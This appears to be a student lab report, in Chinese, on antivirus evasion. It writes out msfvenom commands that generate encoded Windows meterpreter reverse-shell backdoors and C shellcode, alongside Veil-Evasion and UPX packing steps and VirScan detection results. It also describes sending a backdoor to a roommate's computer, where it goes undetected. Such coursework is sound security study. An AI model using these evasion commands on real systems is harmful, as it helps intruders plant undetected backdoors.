• 20155223 Exp3 免杀原理与实践 实验报告


    20155223 Exp3 免杀原理与实践 实验报告

    实验前准备

    安装Veil-Evasion

    • 直接使用Kali快速安装命令,拒绝采用git安装命令
      apt-get -y install veil-evasion
      veil --setup
    • 启动Veil
      在生成的文档Veil里开启终端,输入命令veil。
      之前没人告诉我,启动Veil是在生成的Veil文件夹里启动,而不是在外面直接输入命令启动,让我耗费一个白天在更新Kail源、换Veil版本等不相干事件上。

    正式实验

    用VirScan来检测后门

    • 重命名Exp2中生成的后门可执行文件为backdoor_su.exe,让其接受VirScan的审判
      VirScan包含有39个国内外杀毒软件(不包含360安全卫士),其检测结果可信度较高。
      不能使用原命名文件,若使用,VirScan会以“可疑广告文件”为由拒绝扫描。

    19个报错。

    • 重复编码
      输入命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b ‘x00’ LHOST=[数据删除] LPORT=443 -f exe > notBackdoor.exe
      收获结果:

    还是有19个报错,而且还是相同的查杀软件。
    可以肯定的是,多次编码并没有掩盖到源码的特征码,或是多次编码的次数使得特征码掩盖又出现了。

    shellcode后门生成

    • 输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=[数据删除] LPORT=443 -f c
      获得生成shellcode[数据删除]
      将获得的码贴入到宿主机上的VS中,编译出一个全新的后门程序(宿主机防护以关闭)。
      程序运行中:

      Kali监听:

    和实验二的结果一致。

    • 将产生的后门交给VirScan审判。
      判决结果:

    8个报错。

    shellcode多次编译

    • 输入命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 13 LHOST=[数据删除] LPORT=443 -f c
      重复上一个操作。
      仍然可以使用:

      VirScan审判结果:

    5个报错,被初步认定是后门。

    陷害室友传输后门验证免杀效果

    • 在两台电脑可以互相ping通的条件下,向受害主机发送后门。
    • 受害主机开启QQ电脑管家全程监控,没反应。
    • 免杀成功(仅针对版本12.9.19161.223)
      证据:

    Veil-Evasion使用

    • 根据教程启动Veil。

      建立出来的程序在var/lib下,找到、逮捕、交给VirScan。

      6个报错,不知道是不是哪里我搞错了。

    加壳

    • 对shellcode多次编码编译出来的后门进行加壳。
      加壳程序为upx。
      考虑到upx已经成为杀毒软件众矢之的,因此我对本次操作期望不高,只要报错的软件个数还个位数我就去蹦极很高兴。

    我就知道!

    基础问题回答

    杀软是如何检测出恶意代码的?

    看代码堆里面是否存在恶意代码的特征,若出现特征码,杀毒软件就会清理可疑代码。

    免杀是做什么?

    掩盖特征码。

    免杀的基本方法有哪些?

    加壳(主流的加壳软件就别想,肯定早就被盯上了)、逆序特征码、异或特征码。

    实验感想

    即使是很明显的后门特征出现,也会有杀毒软件不报错。出现这种情况,我一般认为是软件的病毒库没更新,但是我看见有2018.4.6更新病毒库的杀毒软件也没有报错,我后背一阵发凉。
    要想保证电脑能够接近100%地探测后门,我看还是给电脑安装一个专司杀毒的AI吧。
    SCP-079

  • 相关阅读:
    艾伟_转载:学习 ASP.NET MVC (第三回)实战篇 狼人:
    艾伟_转载:40条ASP.NET开发Tip 狼人:
    艾伟_转载:20条.NET编码习惯 狼人:
    艾伟_转载:数组排序方法的性能比较(上):注意事项及试验 狼人:
    艾伟_转载:使用LINQ to SQL更新数据库(上):问题重重 狼人:
    艾伟_转载:学习 ASP.NET MVC (第四回)实战篇 狼人:
    艾伟_转载:学习 ASP.NET MVC (第五回)理论篇 狼人:
    艾伟_转载:ASP.NET MVC 2博客系列 狼人:
    艾伟_转载:Cookie是什么?用法是怎样?与SESSION有什么区别?(二) 狼人:
    艾伟_转载:ASP.NET MVC 2博客系列之一:强类型HTML辅助方法 狼人:
  • 原文地址:https://www.cnblogs.com/battlefieldheros/p/8733926.html
Copyright © 2020-2023  润新知